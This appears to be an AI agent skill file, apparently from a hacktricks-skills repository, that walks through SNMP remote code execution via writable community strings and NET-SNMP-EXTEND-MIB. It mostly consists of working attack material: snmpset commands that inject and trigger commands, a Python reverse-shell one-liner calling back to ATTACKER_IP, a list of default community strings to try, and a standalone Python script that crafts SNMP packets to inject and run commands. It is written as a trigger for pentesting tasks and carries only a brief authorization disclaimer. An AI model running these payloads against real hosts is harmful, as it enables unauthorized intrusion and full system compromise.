Hacktricks-skills snmp-rce-exploitation

Exploit SNMP services with write-accessible community strings to achieve remote code execution. Use this skill whenever you need to test SNMP security, enumerate SNMP services, inject commands via NET-SNMP-EXTEND-MIB, or gain shell access through SNMP misconfigurations. Trigger this for any SNMP pentesting task, especially when you have or suspect write-accessible community strings.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/network-services-pentesting/pentesting-snmp/snmp-rce/SKILL.MD
source content

SNMP Remote Code Execution Exploitation

This skill enables exploitation of SNMP services configured with write-accessible community strings to achieve remote code execution on target systems.

When to Use This Skill

Use this skill when:

  • You have identified a Net-SNMP service and need to test whether a writable community string can be turned into code execution
  • You have or suspect write-accessible community strings (rwcommunity)
  • You need to enumerate SNMP services and their configurations
  • You want to inject commands via NET-SNMP-EXTEND-MIB
  • You need to establish reverse shells through SNMP exploitation

Prerequisites

Before attempting SNMP RCE exploitation:

  1. Install required tools:

    sudo apt install snmp snmp-mibs-downloader rlwrap -y
    
    On Debian/Ubuntu the default /etc/snmp/snmp.conf contains a "mibs :" line that disables MIB loading; comment it out (or pass -m ALL / -m +NET-SNMP-EXTEND-MIB on each command) so the symbolic names used below resolve.

  2. Verify SNMP connectivity to the target:

    snmpwalk -v2c -c <community_string> <target_ip> system
    
  3. Confirm write access by setting a value:

    snmpset -v2c -c <community_string> <target_ip> system.sysName.0 s "test"
    
    This changes the hostname the target reports over SNMP, so note the original sysName from step 2 and set it back the same way once write access is confirmed. A read-only community string answers this set with an error (typically noAccess) instead of the new value.

Exploitation Workflow

Step 1: Enumerate SNMP Service

First, enumerate the SNMP service to understand what's available:

snmpwalk -v2c -c <community_string> <target_ip> NET-SNMP-EXTEND-MIB::nsExtendObjects

This lists any extend entries the administrator has already configured (nsExtendCommand, nsExtendArgs and their output). Note that the walk itself executes those existing commands on the target, because extend entries run on read, so keep that in mind when enumerating production hosts. An empty result means no entries exist yet, not that the MIB is unsupported; a noSuchObject answer means the agent is not Net-SNMP and this technique does not apply.

Step 2: Inject a Test Command

Inject a simple test command to verify RCE capability. The quoted name ("testcommand") is the nsExtendToken that indexes the new row; the -m +NET-SNMP-EXTEND-MIB option loads the MIB so the column names resolve:

snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c <community_string> <target_ip> \
  'nsExtendStatus."testcommand"' = createAndGo \
  'nsExtendCommand."testcommand"' = /bin/echo \
  'nsExtendArgs."testcommand"' = 'hello world'

Step 3: Trigger Command Execution

Execute the injected command by reading the MIB objects:

snmpwalk -v2c -c <community_string> <target_ip> NET-SNMP-EXTEND-MIB::nsExtendObjects

Important: the default nsExtendRunType is run-on-read, so the agent runs the command when its output objects are read and returns the output in nsExtendOutput1Line, nsExtendOutputFull and nsExtendOutLine, with the exit status in nsExtendResult. The walk above covers those objects, which is why it triggers execution. The result is cached briefly (nsExtendCacheTime, 5 seconds by default); after that every read re-runs the command.

Step 4: Establish Reverse Shell

For interactive shell access, first set up a listener on your attacker machine:

nc -lvnp <PORT>

Then inject a reverse shell command:

snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c <community_string> <target_ip> \
  'nsExtendStatus."shell"' = createAndGo \
  'nsExtendCommand."shell"' = /usr/bin/python3 \
  'nsExtendArgs."shell"' = '-c "import sys,socket,os,pty;s=socket.socket();s.connect((\"<ATTACKER_IP>\",<PORT>));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/sh\")"'

Then trigger it:

snmpwalk -v2c -c <community_string> <target_ip> NET-SNMP-EXTEND-MIB::nsExtendObjects

The snmpwalk hangs and eventually times out because the agent waits for the command to finish; the shell stays connected in the meantime. It runs with the privileges of the snmpd process, which is root on many appliances and older installs but an unprivileged service account (for example Debian-snmp) on current Debian/Ubuntu packages. When you are done, remove the row by setting its nsExtendStatus to destroy, otherwise the next walk of the table (by you or by a monitoring system) re-runs the payload.

Alternative: Using snmp-shell Tool

For a more robust shell experience, use the mxrch/snmp-shell tool:

git clone https://github.com/mxrch/snmp-shell.git
cd snmp-shell
sudo python3 -m pip install -r requirements.txt

Then run:

python3 snmp-shell.py -c <community_string> -t <target_ip>

Common Community Strings to Test

Try these default/weak community strings:

  • public (read-only default)
  • private (read-write default)
  • c0nfig
  • SuP3RPrivCom90
  • admin
  • manager
  • default
  • test
  • community

Key Concepts

NET-SNMP-EXTEND-MIB

The NET-SNMP-EXTEND-MIB (OID prefix 1.3.6.1.4.1.8072.1.3.2) lets administrators extend the Net-SNMP agent with custom commands, normally through "extend" lines in snmpd.conf. With a writable community string the same rows can be created over the network. The nsExtendObjects subtree contains a configuration table, indexed by nsExtendToken (the quoted name in the commands above), with:

  • nsExtendStatus: RowStatus of the entry (createAndGo to create and activate it, destroy to remove it)
  • nsExtendCommand: Absolute path to the executable
  • nsExtendArgs: Arguments to pass to the command
  • nsExtendExecType: exec (default), which runs the binary directly with the arguments split on whitespace, or shell, which passes the line through /bin/sh
  • nsExtendRunType: run-on-read (default) or run-on-set

and output tables holding nsExtendOutput1Line, nsExtendOutputFull and nsExtendResult (first line, full output and exit status of the last run) for each row.

Run-on-Read Behavior

Commands injected via nsExtendObjects execute when the MIB object is read (via snmpwalk or similar). This is the core exploitation mechanism.
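
The workflow above (Steps 1 to 4) and the MIB layout described in this section both come down to a few SNMPv2c SetRequest and GetRequest packets against fixed OIDs. The script below is an added illustration, not code from the hacktricks-skills repository or from Net-SNMP: it builds those packets by hand with only the Python standard library, so it doubles as a fallback when the net-snmp tools or MIB files are not installed on the attacking host. It shows how the quoted token in nsExtendStatus."testcommand" becomes a length-prefixed OID index, sends createAndGo, command and args in one SetRequest (what the snmpset in Step 2 does), reads nsExtendOutputFull to trigger run-on-read, and destroys the row afterwards. Column numbers and constants are taken from NET-SNMP-EXTEND-MIB and RFC 3416; the function and variable names are this example's own.

```python
"""Hand-built SNMPv2c Set/Get for NET-SNMP-EXTEND-MIB rows, Python standard library only."""
import socket

CONFIG_ENTRY = "1.3.6.1.4.1.8072.1.3.2.2.1"   # nsExtendConfigEntry; columns below, then the token index
COL_COMMAND, COL_ARGS, COL_STATUS = 2, 3, 21   # nsExtendCommand, nsExtendArgs, nsExtendStatus
OUTPUT_FULL = "1.3.6.1.4.1.8072.1.3.2.3.1.2"   # nsExtendOutputFull, reading it triggers run-on-read
CREATE_AND_GO, DESTROY, GET_REQUEST, SET_REQUEST = 4, 6, 0xA0, 0xA3  # RowStatus values; PDU tags

def ber_len(n):  # short form below 128, otherwise 0x81/0x82 plus the length bytes (enough for UDP)
    return bytes([n]) if n < 0x80 else bytes([0x81, n]) if n < 0x100 else bytes([0x82, n >> 8, n & 0xFF])

def tlv(tag, payload):
    return bytes([tag]) + ber_len(len(payload)) + payload

def encode_int(v):
    return tlv(0x02, v.to_bytes(max(1, (v.bit_length() + 8) // 8), "big", signed=True))

def encode_oid(dotted):
    arcs = [int(a) for a in dotted.strip(".").split(".")]
    body = bytearray([arcs[0] * 40 + arcs[1]])
    for arc in arcs[2:]:  # base 128, continuation bit on every byte but the last
        groups = [arc & 0x7F]
        while arc > 0x7F:
            arc >>= 7
            groups.insert(0, 0x80 | (arc & 0x7F))
        body += bytes(groups)
    return tlv(0x06, bytes(body))

def extend_index(token):
    """nsExtendToken is a non-IMPLIED string index: one arc for the length, then one arc per byte."""
    raw = token.encode()
    return ".".join(str(b) for b in (len(raw), *raw))

def column_oid(column, token):
    return f"{CONFIG_ENTRY}.{column}.{extend_index(token)}"

def inject_varbinds(token, command, args):
    """The three varbinds the page's snmpset sends: createAndGo, absolute command path, args."""
    return [(column_oid(COL_STATUS, token), encode_int(CREATE_AND_GO)),
            (column_oid(COL_COMMAND, token), tlv(0x04, command.encode())),
            (column_oid(COL_ARGS, token), tlv(0x04, args.encode()))]

def destroy_varbinds(token):
    """RowStatus destroy removes the row so the next reader of the table does not re-run it."""
    return [(column_oid(COL_STATUS, token), encode_int(DESTROY))]

def build_message(community, request_id, varbinds, pdu_tag):
    vbl = b"".join(tlv(0x30, encode_oid(oid) + value) for oid, value in varbinds)
    pdu = tlv(pdu_tag, encode_int(request_id) + encode_int(0) + encode_int(0) + tlv(0x30, vbl))
    return tlv(0x30, encode_int(1) + tlv(0x04, community.encode()) + pdu)  # version 1 == SNMPv2c

def read_tlv(buf, pos=0):
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:  # long form: low seven bits give the number of length bytes
        length, pos = int.from_bytes(buf[pos:pos + (length & 0x7F)], "big"), pos + (length & 0x7F)
    return tag, buf[pos:pos + length], pos + length

def children(buf):  # (tag, body) pairs of a constructed value
    out, pos = [], 0
    while pos < len(buf):
        tag, body, pos = read_tlv(buf, pos)
        out.append((tag, body))
    return out

def decode_oid(body):
    arcs, val = [body[0] // 40, body[0] % 40], 0
    for b in body[1:]:
        val = (val << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs, val = arcs + [val], 0
    return ".".join(map(str, arcs))

def parse_message(msg):
    """Return (request_id, error_status, [(oid, value), ...]); value is int, str or None."""
    _, _, (_, pdu) = children(read_tlv(msg)[1])          # version, community, PDU
    (_, rid), (_, err), _, (_, vbl) = children(pdu)      # error-index is skipped
    varbinds = []
    for _, vb in children(vbl):
        (_, oid), (vtag, vbody) = children(vb)
        value = (int.from_bytes(vbody, "big", signed=True) if vtag == 0x02
                 else vbody.decode(errors="replace") if vtag == 0x04 else None)
        varbinds.append((decode_oid(oid), value))
    return int.from_bytes(rid, "big", signed=True), int.from_bytes(err, "big", signed=True), varbinds

def snmp_exchange(target, message, timeout=5.0):  # UDP/161 round trip; authorized targets only
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(message, (target, 161))
        return parse_message(s.recvfrom(65535)[0])

def run_extend_command(target, community, token, command, args):
    """Inject the row, read nsExtendOutputFull (run-on-read), destroy the row, return the output."""
    _, err, _ = snmp_exchange(target, build_message(community, 1, inject_varbinds(token, command, args), SET_REQUEST))
    if err:
        raise RuntimeError(f"SetRequest rejected, error-status {err}: community not writable?")
    get = build_message(community, 2, [(f"{OUTPUT_FULL}.{extend_index(token)}", b"\x05\x00")], GET_REQUEST)  # NULL
    _, _, vbs = snmp_exchange(target, get)
    snmp_exchange(target, build_message(community, 3, destroy_varbinds(token), SET_REQUEST))
    return vbs[0][1]
```

Usage: from a Python shell on the attacking host, run_extend_command("<target_ip>", "<community_string>", "testcommand", "/bin/echo", "hello world") returns the command output (the same thing the Step 3 walk shows), or raises if the SetRequest comes back with a non-zero error-status, which is what a read-only community produces. Substituting the Step 4 python3 command and arguments gives the reverse shell; in that case the GetRequest times out while the shell is alive, so wrap that call in a try/except or raise the timeout. Because the script destroys the row after reading, it also demonstrates the cleanup step that the manual snmpset workflow leaves to you.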

Requirements for Success

  1. Write-accessible community string - The community string must have write permissions, and the agent's write view (com2sec/view/access in snmpd.conf) must include the nsExtendObjects subtree
  2. Net-SNMP agent - NET-SNMP-EXTEND-MIB is specific to snmpd from the Net-SNMP project; the Windows SNMP service and most vendor-specific agents do not implement it
  3. Executable binary path - The command path must be absolute and executable by the user snmpd runs as
  4. SNMP service running - Target must have SNMP daemon active
  5. No restrictions - No firewall or access control blocking UDP/161 between you and the target

Troubleshooting

Command Not Executing

  • Verify the community string has write access
  • Check the absolute path to the binary exists on target
  • Ensure the binary is executable
  • Confirm SNMP service is running on target

No Response from Target

  • Verify network connectivity
  • Check if SNMP port (161/UDP) is open
  • Confirm the community string is correct
  • Check for firewall rules blocking SNMP

Shell Disconnects Immediately

  • Wrap the listener in rlwrap for line editing and command history
  • Try different shell types (bash, sh, python); the interpreter path must exist on the target
  • Consider using the snmp-shell tool, which gives a pseudo-shell by sending each command through the extend table for you

Safety and Ethics

Only use this skill on systems you have explicit authorization to test. Unauthorized exploitation of SNMP services is illegal and unethical.
